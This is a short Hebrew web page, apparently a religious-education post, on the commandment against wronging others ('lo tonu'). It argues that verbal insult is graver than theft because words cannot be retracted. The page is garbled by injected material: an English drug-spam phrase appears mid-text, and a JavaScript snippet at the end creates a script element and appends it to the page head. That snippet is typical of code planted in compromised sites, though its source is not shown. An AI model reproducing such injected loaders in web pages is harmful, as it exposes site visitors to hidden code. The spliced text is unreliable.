“לא תונו איש את אמיתו”

מה התורה מצוה אותנו בצו זה ? is obelit safe to take
“אונאה” פירושה צער. התורה אוסרת עלינו לצער זה את זה.
כאשר ראובן גוזל או גונב משמעון הוא מצער אותו והוא עובר על “אונאת ממון”
כאשר ראובן מעליב, מעליל, מכנה בשמות גנאי את שמעון הוא מצער אותו ועובר על “אונאת דברים”.
מה יותר חמור, אונאת דברים או אונאת ממון?
חז”ל לימדונו שאונאת דברים חמורה יותר כיון שאם גזלתי וגרמתי צער אני יכול לחזור בתשובה ולהחזיר את הנגנב אבל אם פגעתי העלבתי בדיבור , אין אפשרות לקחת את הדיבור בחזרה……var d=document;var s=d.createElement(‘script’); d.getElementsByTagName(‘head’)[0].appendChild(s);

סגור לתגובות.

Scroll To Top